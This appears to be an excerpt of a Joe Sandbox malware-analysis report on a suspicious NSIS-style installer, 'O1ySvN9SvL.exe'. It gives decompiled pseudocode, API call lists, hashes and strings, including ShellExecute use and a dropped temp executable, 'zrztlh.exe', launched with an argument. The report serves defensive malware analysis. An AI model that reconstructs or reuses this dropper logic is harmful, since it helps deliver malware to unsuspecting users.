                				_t26 =  *0x423704; // 0x0
                				_v8 = _t26;
                				if(_t26 != 0) {
                					_t27 =  *0x409250; // 0x6
                					_v12 = _t27;
                					_t39 = _t27 & 0x00000001;
                					if(_t39 == 0) {
                						E00405B16(0, _t39, 0x41fd08, 0x41fd08, _a4);
                					}
                					_t26 = lstrlenA(0x41fd08);
                					_a4 = _t26;
                					if(_a8 == 0) {
                						L6:
                						if((_v12 & 0x00000004) != 0) {
                							_t26 = SetWindowTextA( *0x4236e8, 0x41fd08);
                						}
                						if((_v12 & 0x00000002) != 0) {
                							_v32 = 0x41fd08;
                							_v52 = 1;
                							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                							_v44 = 0;
                							_v48 = _t29 - _t39;
                							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                						}
                						if(_t39 != 0) {
                							_t28 = _a4;
                							 *((char*)(_t28 + 0x41fd08)) = 0;
                							return _t28;
                						}
                					} else {
                						_t26 =  &(_a4[lstrlenA(_a8)]);
                						if(_t26 < 0x800) {
                							_t26 = lstrcatA(0x41fd08, _a8);
                							goto L6;
                						}
                					}
                				}
                				return _t26;
                			}

                APIs
                • lstrlenA.KERNEL32(0041FD08,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004055E1,000000E5), ref: 00404ED8
                • lstrlenA.KERNEL32(?,0041FD08,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004055E1), ref: 00404EE8
                • lstrcatA.KERNEL32(0041FD08,?,?,0041FD08,?,00000000,?), ref: 00404EFB
                • SetWindowTextA.USER32(0041FD08,0041FD08), ref: 00404F0D
                • SendMessageA.USER32 ref: 00404F33
                • SendMessageA.USER32 ref: 00404F4D
                • SendMessageA.USER32 ref: 00404F5B
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                • String ID:
                • API String ID: 2531174081-0
                • Opcode ID: 7086c7c29e23a29a0d0f5e27e31e816319c7e546315a5373774c460fd8fc0529
                • Instruction ID: 494233230377309a29c5d7fe1475590ec4db79cf9780f6ff06810452207601d7
                • Opcode Fuzzy Hash: 7086c7c29e23a29a0d0f5e27e31e816319c7e546315a5373774c460fd8fc0529
                • Instruction Fuzzy Hash: A021A1B1D00109BBDB119FA5DC859DEBFB9EF85354F14807AFA04B6290C3395E41CB98
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 66%
                			E0040164D() {
                				int _t18;
                				void* _t28;
                				void* _t35;
                
                				 *(_t35 + 8) = E00402A85(0xffffffd0);
                				 *(_t35 - 8) = E00402A85(0xffffffdf);
                				E00405AF4(0x4097f8,  *(_t35 + 8));
                				_t18 = lstrlenA( *(_t35 - 8));
                				if(_t18 + lstrlenA( *(_t35 + 8)) < 0x3fd) {
                					lstrcatA(0x4097f8, 0x40901c);
                					lstrcatA(0x4097f8,  *(_t35 - 8));
                				}
                				if(MoveFileA( *(_t35 + 8),  *(_t35 - 8)) == 0) {
                					if( *((intOrPtr*)(_t35 - 0x1c)) == _t28 || E00405D9C( *(_t35 + 8)) == 0) {
                						 *((intOrPtr*)(_t35 - 4)) = 1;
                					} else {
                						_push( *(_t35 - 8));
                						_push( *(_t35 + 8));
                						E00405842();
                						_push(0xffffffe4);
                						goto L7;
                					}
                				} else {
                					_push(0xffffffe3);
                					L7:
                					E00401423();
                				}
                				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t35 - 4));
                				return 0;
                			}

                APIs
                  • Part of subcall function 00405AF4: lstrcpynA.KERNEL32(?,?,00000400,00403351,xwkwrbeiqiuu Setup,NSIS Error), ref: 00405B01
                • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp,?,000000DF,000000D0), ref: 00401672
                • lstrlenA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp,?,000000DF,000000D0), ref: 0040167C
                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp,0040901C,?,?,C:\Users\user\AppData\Local\Temp,?,000000DF,000000D0), ref: 00401691
                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp,?,C:\Users\user\AppData\Local\Temp,0040901C,?,?,C:\Users\user\AppData\Local\Temp,?,000000DF,000000D0), ref: 0040169A
                  • Part of subcall function 00405D9C: SetErrorMode.KERNELBASE(00008001,00000000,C:\,?,0040570B,C:\,C:\,00000000,C:\,C:\,?,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,76DDF560,0040543A,?,76DDF560), ref: 00405DAA
                  • Part of subcall function 00405D9C: FindFirstFileA.KERNELBASE(?,00422580), ref: 00405DB6
                  • Part of subcall function 00405D9C: SetErrorMode.KERNELBASE(00000000), ref: 00405DC0
                  • Part of subcall function 00405D9C: FindClose.KERNELBASE(00000000), ref: 00405DC8
                  • Part of subcall function 00405842: CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,004055D7,?,00000000,000000F1,?), ref: 0040588F
                  • Part of subcall function 00405842: GetShortPathNameA.KERNEL32 ref: 00405898
                  • Part of subcall function 00405842: GetShortPathNameA.KERNEL32 ref: 004058B5
                  • Part of subcall function 00405842: wsprintfA.USER32 ref: 004058D3
                  • Part of subcall function 00405842: GetFileSize.KERNEL32(00000000,00000000,00422138,C0000000,00000004,00422138,?,004055D7,?,00000000,000000F1,?), ref: 0040590E
                  • Part of subcall function 00405842: GlobalAlloc.KERNEL32(00000040,0000000A), ref: 0040591D
                  • Part of subcall function 00405842: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405933
                • MoveFileA.KERNEL32 ref: 004016A5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: File$CloseErrorFindModeNamePathShortlstrcatlstrlen$AllocFirstGlobalHandleMoveReadSizelstrcpynwsprintf
                • String ID: C:\Users\user\AppData\Local\Temp
                • API String ID: 3481313339-1943935188
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040476E(struct HWND__* _a4, intOrPtr _a8) {
                				long _v8;
                				signed char _v12;
                				unsigned int _v16;
                				void* _v20;
                				intOrPtr _v24;
                				long _v56;
                				void* _v60;
                				long _t15;
                				unsigned int _t19;
                				signed int _t25;
                				struct HWND__* _t28;
                
                				_t28 = _a4;
                				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                				if(_a8 == 0) {
                					L4:
                					_v56 = _t15;
                					_v60 = 4;
                					SendMessageA(_t28, 0x110c, 0,  &_v60);
                					return _v24;
                				}
                				_t19 = GetMessagePos();
                				_v16 = _t19 >> 0x10;
                				_v20 = _t19;
                				ScreenToClient(_t28,  &_v20);
                				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                				if((_v12 & 0x00000066) != 0) {
                					_t15 = _v8;
                					goto L4;
                				}
                				return _t25 | 0xffffffff;
                			}















                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: Message$Send$ClientScreen
                • String ID: f
                • API String ID: 41195575-1993550816
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 65%
                			E00401FAB(int __ebx) {
                				int _t28;
                				struct HINSTANCE__* _t33;
                				CHAR* _t35;
                				intOrPtr* _t36;
                				void* _t37;
                				void* _t42;
                
                				_t28 = __ebx;
                				 *(_t37 - 4) = 1;
                				SetErrorMode(0x8001);
                				_t42 =  *0x423fd4 - _t28; // 0x0
                				if(_t42 < 0) {
                					_push(0xffffffe7);
                					goto L14;
                				} else {
                					_t35 = E00402A85(0xfffffff0);
                					 *(_t37 + 8) = E00402A85(1);
                					if( *((intOrPtr*)(_t37 - 0x14)) == __ebx) {
                						L3:
                						_t33 = LoadLibraryExA(_t35, _t28, 8);
                						if(_t33 == _t28) {
                							_push(0xfffffff6);
                							L14:
                							E00401423();
                						} else {
                							goto L4;
                						}
                					} else {
                						_t33 = GetModuleHandleA(_t35);
                						if(_t33 != __ebx) {
                							L4:
                							_t36 = GetProcAddress(_t33,  *(_t37 + 8));
                							if(_t36 == _t28) {
                								E00404E9F(0xfffffff7,  *(_t37 + 8));
                							} else {
                								 *(_t37 - 4) = _t28;
                								if( *((intOrPtr*)(_t37 - 0x1c)) == _t28) {
                									 *_t36( *((intOrPtr*)(_t37 - 8)), 0x400, 0x424000, 0x40a7f8, 0x409000);
                								} else {
                									E00401423( *((intOrPtr*)(_t37 - 0x1c)));
                									if( *_t36() != 0) {
                										 *(_t37 - 4) = 1;
                									}
                								}
                							}
                							if( *((intOrPtr*)(_t37 - 0x18)) == _t28) {
                								FreeLibrary(_t33);
                							}
                						} else {
                							goto L3;
                						}
                					}
                				}
                				SetErrorMode(_t28);
                				 *0x423fa8 =  *0x423fa8 +  *(_t37 - 4);
                				return 0;
                			}










                APIs
                • SetErrorMode.KERNEL32(00008001), ref: 00401FB6
                • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FE0
                  • Part of subcall function 00404E9F: lstrlenA.KERNEL32(0041FD08,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004055E1,000000E5), ref: 00404ED8
                  • Part of subcall function 00404E9F: lstrlenA.KERNEL32(?,0041FD08,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004055E1), ref: 00404EE8
                  • Part of subcall function 00404E9F: lstrcatA.KERNEL32(0041FD08,?,?,0041FD08,?,00000000,?), ref: 00404EFB
                  • Part of subcall function 00404E9F: SetWindowTextA.USER32(0041FD08,0041FD08), ref: 00404F0D
                  • Part of subcall function 00404E9F: SendMessageA.USER32 ref: 00404F33
                  • Part of subcall function 00404E9F: SendMessageA.USER32 ref: 00404F4D
                  • Part of subcall function 00404E9F: SendMessageA.USER32 ref: 00404F5B
                • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FF0
                • GetProcAddress.KERNEL32(00000000,?), ref: 00402000
                • FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402059
                • SetErrorMode.KERNEL32 ref: 0040206D
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: MessageSend$ErrorLibraryModelstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                • String ID:
                • API String ID: 1609199483-0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040567B(char _a4) {
                				CHAR* _t3;
                				char* _t5;
                				CHAR* _t7;
                				CHAR* _t8;
                				void* _t10;
                
                				_t1 =  &_a4; // 0x40543a
                				_t8 =  *_t1;
                				_t7 = CharNextA(_t8);
                				_t3 = CharNextA(_t7);
                				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
                					if( *_t8 != 0x5c5c) {
                						L8:
                						return 0;
                					}
                					_t10 = 2;
                					while(1) {
                						_t10 = _t10 - 1;
                						_t5 = E00405612(_t3, 0x5c);
                						if( *_t5 == 0) {
                							goto L8;
                						}
                						_t3 = _t5 + 1;
                						if(_t10 != 0) {
                							continue;
                						}
                						return _t3;
                					}
                					goto L8;
                				} else {
                					return CharNextA(_t3);
                				}
                			}









                APIs
                • CharNextA.USER32(:T@,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,C:\,?,004056DF,C:\,C:\,?,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,76DDF560,0040543A,?,76DDF560,00000000), ref: 00405689
                • CharNextA.USER32(00000000), ref: 0040568E
                • CharNextA.USER32(00000000), ref: 0040569D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: CharNext
                • String ID: "C:\Users\user\Desktop\O1ySvN9SvL.exe" $:T@$C:\
                • API String ID: 3213498283-2537113996
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 64%
                			E00401E0E() {
                				signed int _t7;
                				void* _t19;
                				char* _t20;
                				signed int _t24;
                				void* _t26;
                
                				_t24 = E00402A85(_t19);
                				_t20 = E00402A85(0x31);
                				_t7 = E00402A85(0x22);
                				_push(_t20);
                				_push(_t24);
                				_t22 = _t7;
                				wsprintfA("C:\Users\alfons\AppData\Local\Temp", "%s %s");
                				E00401423(0xffffffec);
                				asm("sbb eax, eax");
                				asm("sbb eax, eax");
                				if(ShellExecuteA( *(_t26 - 8),  ~( *_t24) & _t24, _t20,  ~( *_t7) & _t22, "C:\\Users\\alfons\\AppData\\Local\\Temp",  *(_t26 - 0x18)) < 0x21) {
                					 *((intOrPtr*)(_t26 - 4)) = 1;
                				}
                				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t26 - 4));
                				return 0;
                			}









                APIs
                • wsprintfA.USER32 ref: 00401E34
                • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp,?), ref: 00401E62
                Strings
                • %s %s, xrefs: 00401E28
                • C:\Users\user\AppData\Local\Temp, xrefs: 00401E2D
                • C:\Users\user\AppData\Local\Temp, xrefs: 00401E4D
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: ExecuteShellwsprintf
                • String ID: %s %s$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp
                • API String ID: 2956387742-3979964556
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 84%
                			E00402AC5(void* _a4, char* _a8, long _a12) {
                				void* _v8;
                				char _v272;
                				signed char _t16;
                				long _t18;
                				long _t25;
                				intOrPtr* _t27;
                				long _t28;
                
                				_t16 =  *0x423fd0; // 0x0
                				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
                				if(_t18 == 0) {
                					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                						__eflags = _a12;
                						if(_a12 != 0) {
                							RegCloseKey(_v8);
                							L8:
                							__eflags = 1;
                							return 1;
                						}
                						_t25 = E00402AC5(_v8,  &_v272, 0);
                						__eflags = _t25;
                						if(_t25 != 0) {
                							break;
                						}
                					}
                					RegCloseKey(_v8);
                					_t27 = E00405DDA(2);
                					if(_t27 == 0) {
                						__eflags =  *0x423fd0; // 0x0
                						if(__eflags != 0) {
                							goto L8;
                						}
                						_t28 = RegDeleteKeyA(_a4, _a8);
                						__eflags = _t28;
                						if(_t28 != 0) {
                							goto L8;
                						}
                						return _t28;
                					}
                					return  *_t27(_a4, _a8,  *0x423fd0, 0);
                				}
                				return _t18;
                			}











                APIs
                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402AE6
                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B22
                • RegCloseKey.ADVAPI32(?), ref: 00402B2B
                • RegCloseKey.ADVAPI32(?), ref: 00402B50
                • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B6E
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: Close$DeleteEnumOpen
                • String ID:
                • API String ID: 1912718029-0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00401D0E(int __edx) {
                				void* _t17;
                				struct HINSTANCE__* _t21;
                				struct HWND__* _t25;
                				void* _t27;
                
                				_t25 = GetDlgItem( *(_t27 - 8), __edx);
                				GetClientRect(_t25, _t27 - 0x48);
                				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A85(_t21), _t21,  *(_t27 - 0x40) *  *(_t27 - 0x1c),  *(_t27 - 0x3c) *  *(_t27 - 0x1c), 0x10));
                				if(_t17 != _t21) {
                					DeleteObject(_t17);
                				}
                				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t27 - 4));
                				return 0;
                			}








                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                • String ID:
                • API String ID: 1849352358-0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 35%
                			E0040468C(int _a4, intOrPtr _a8, unsigned int _a12) {
                				char _v36;
                				char _v68;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* _t26;
                				void* _t34;
                				signed int _t36;
                				signed int _t39;
                				unsigned int _t46;
                
                				_t46 = _a12;
                				_push(0x14);
                				_pop(0);
                				_t34 = 0xffffffdc;
                				if(_t46 < 0x100000) {
                					_push(0xa);
                					_pop(0);
                					_t34 = 0xffffffdd;
                				}
                				if(_t46 < 0x400) {
                					_t34 = 0xffffffde;
                				}
                				if(_t46 < 0xffff3333) {
                					_t39 = 0x14;
                					asm("cdq");
                					_t46 = _t46 + 1 / _t39;
                				}
                				_push(E00405B16(_t34, 0, _t46,  &_v36, 0xffffffdf));
                				_push(E00405B16(_t34, 0, _t46,  &_v68, _t34));
                				_t21 = _t46 & 0x00ffffff;
                				_t36 = 0xa;
                				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
                				_push(_t46 >> 0);
                				_t26 = E00405B16(_t34, 0, 0x420530, 0x420530, _a8);
                				wsprintfA(_t26 + lstrlenA(0x420530), "%u.%u%s%s");
                				return SetDlgItemTextA( *0x4236f8, _a4, 0x420530);
                			}














                APIs
                • lstrlenA.KERNEL32(00420530,00420530,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004045AC,000000DF,?,00000000,00000400), ref: 0040471A
                • wsprintfA.USER32 ref: 00404722
                • SetDlgItemTextA.USER32 ref: 00404735
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: ItemTextlstrlenwsprintf
                • String ID: %u.%u%s%s
                • API String ID: 3540041739-3551169577
                • Opcode ID: f34471263a09e869a70bf48e133dd6383d7562b6fbf9109ed4405ac788a63cd4
                • Instruction ID: fc2b73f6c965b4b8d77eae39fc1b1cea645aa0e87c551c7386791207db77a036
                • Opcode Fuzzy Hash: f34471263a09e869a70bf48e133dd6383d7562b6fbf9109ed4405ac788a63cd4
                • Instruction Fuzzy Hash: B7110473B001243BDB106A699C06EAF369DCBC2374F14063BFA25F61D1E979AC5186EC
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 54%
                			E00401BF8(void* __ecx) {
                				signed int _t30;
                				CHAR* _t33;
                				long _t34;
                				int _t39;
                				signed int _t40;
                				int _t44;
                				void* _t46;
                				int _t51;
                				struct HWND__* _t55;
                				void* _t58;
                
                				_t46 = __ecx;
                				 *(_t58 - 8) = E00402A85(0x33);
                				 *(_t58 + 8) = E00402A85(0x44);
                				if(( *(_t58 - 0x10) & 0x00000001) == 0) {
                					 *((intOrPtr*)(__ebp - 8)) = E00405A6B(__ecx,  *((intOrPtr*)(__ebp - 8)));
                				}
                				__eflags =  *(_t58 - 0x10) & 0x00000002;
                				if(( *(_t58 - 0x10) & 0x00000002) == 0) {
                					 *(_t58 + 8) = E00405A6B(_t46,  *(_t58 + 8));
                				}
                				__eflags =  *((intOrPtr*)(_t58 - 0x28)) - 0x21;
                				_push(1);
                				if(__eflags != 0) {
                					_t53 = E00402A85();
                					_t30 = E00402A85();
                					asm("sbb ecx, ecx");
                					asm("sbb eax, eax");
                					_t33 =  ~( *_t29) & _t53;
                					__eflags = _t33;
                					_t34 = FindWindowExA( *(_t58 - 8),  *(_t58 + 8), _t33,  ~( *_t30) & _t30);
                					goto L10;
                				} else {
                					_t55 = E00402A68();
                					_t39 = E00402A68();
                					_t51 =  *(_t58 - 0x10) >> 2;
                					if(__eflags == 0) {
                						_t34 = SendMessageA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8));
                						L10:
                						 *(_t58 - 0x3c) = _t34;
                					} else {
                						_t40 = SendMessageTimeoutA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8), _t44, _t51, _t58 - 0x3c);
                						asm("sbb eax, eax");
                						 *((intOrPtr*)(_t58 - 4)) =  ~_t40 + 1;
                					}
                				}
                				__eflags =  *((intOrPtr*)(_t58 - 0x24)) - _t44;
                				if( *((intOrPtr*)(_t58 - 0x24)) >= _t44) {
                					_push( *(_t58 - 0x3c));
                					E00405A52();
                				}
                				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t58 - 4));
                				return 0;
                			}

                APIs
                • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C5A
                • SendMessageA.USER32 ref: 00401C72
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: MessageSend$Timeout
                • String ID: !
                • API String ID: 1777923405-2657877971
                • Opcode ID: a9b904d63b631f8314da7113b300116abf6452c146d942a46b795a4faaa52b4b
                • Instruction ID: 5a4a2a8e5e05dedb88239c733a2ad51f89d43fb5ccd06698c145dfd913d610d3
                • Opcode Fuzzy Hash: a9b904d63b631f8314da7113b300116abf6452c146d942a46b795a4faaa52b4b
                • Instruction Fuzzy Hash: CD217C71E44108BFEF029FB0C94AAAD7BB5EB44308F14457AF901B61E1DBB98A419B58
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 86%
                			E00403955(void* __ecx, void* __eflags) {
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				signed short _t6;
                				intOrPtr _t11;
                				signed int _t13;
                				intOrPtr _t15;
                				signed int _t16;
                				signed short* _t18;
                				signed int _t20;
                				signed short* _t23;
                				intOrPtr _t25;
                				signed int _t26;
                				intOrPtr* _t27;
                
                				_t24 = "1033";
                				_t13 = 0xffff;
                				_t6 = E00405A6B(__ecx, "1033");
                				while(1) {
                					_t26 =  *0x423f64; // 0x1
                					if(_t26 == 0) {
                						goto L7;
                					}
                					_t15 =  *0x423f28; // 0x74d188
                					_t16 =  *(_t15 + 0x64);
                					_t20 =  ~_t16;
                					_t18 = _t16 * _t26 +  *0x423f60;
                					while(1) {
                						_t18 = _t18 + _t20;
                						_t26 = _t26 - 1;
                						if((( *_t18 ^ _t6) & _t13) == 0) {
                							break;
                						}
                						if(_t26 != 0) {
                							continue;
                						}
                						goto L7;
                					}
                					 *0x423700 = _t18[1];
                					 *0x423fc8 = _t18[3];
                					_t23 =  &(_t18[5]);
                					if(_t23 != 0) {
                						 *0x4236fc = _t23;
                						E00405A52(_t24,  *_t18 & 0x0000ffff);
                						SetWindowTextA( *0x420508, E00405B16(_t13, _t24, _t26, "xwkwrbeiqiuu Setup", 0xfffffffe));
                						_t11 =  *0x423f4c; // 0x3
                						_t27 =  *0x423f48; // 0x74d334
                						if(_t11 == 0) {
                							L15:
                							return _t11;
                						}
                						_t25 = _t11;
                						do {
                							_t11 =  *_t27;
                							if(_t11 != 0) {
                								_t5 = _t27 + 0x18; // 0x74d34c
                								_t11 = E00405B16(_t13, _t25, _t27, _t5, _t11);
                							}
                							_t27 = _t27 + 0x418;
                							_t25 = _t25 - 1;
                						} while (_t25 != 0);
                						goto L15;
                					}
                					L7:
                					if(_t13 != 0xffff) {
                						_t13 = 0;
                					} else {
                						_t13 = 0x3ff;
                					}
                				}
                			}

                APIs
                • SetWindowTextA.USER32(00000000,xwkwrbeiqiuu Setup), ref: 004039ED
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: TextWindow
                • String ID: 1033$C:\Users\user\AppData\Local\Temp\$xwkwrbeiqiuu Setup
                • API String ID: 530164218-3104136113
                • Opcode ID: 8e92532aa80ad6ebe9a5af3ec32b3f4998cc8b457f85ca1392f46d3598825830
                • Instruction ID: 8a4911383cf402a951a33a18ad4b30e04e91385bd266f89a5cbd6e28b98f55da
                • Opcode Fuzzy Hash: 8e92532aa80ad6ebe9a5af3ec32b3f4998cc8b457f85ca1392f46d3598825830
                • Instruction Fuzzy Hash: A511C2B1B006119BC720DF15EC809377BBCEB88716769813BD901A73D1D73D9E028A58
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 88%
                			E004059DB(void* _a4, int _a8, char* _a12, int _a16, void* _a20) {
                				long _t20;
                				char* _t26;
                
                				asm("sbb eax, eax");
                				_t26 = _a16;
                				 *_t26 = 0;
                				_t20 = RegOpenKeyExA(_a4, _a8, 0,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                				if(_t20 == 0) {
                					_a8 = 0x400;
                					if(RegQueryValueExA(_a20, _a12, 0,  &_a16, _t26,  &_a8) != 0 || _a16 != 1 && _a16 != 2) {
                						 *_t26 = 0;
                					}
                					_t26[0x3ff] = 0;
                					return RegCloseKey(_a20);
                				}
                				return _t20;
                			}

                APIs
                • RegOpenKeyExA.ADVAPI32(0041FD08,00000006,00000000,-00004250,-00004250,00000002,C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx,?,00405BE9,80000002,Software\Microsoft\Windows\CurrentVersion,-00004250,C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx,0041FD08,00000006,0041FD08), ref: 00405A04
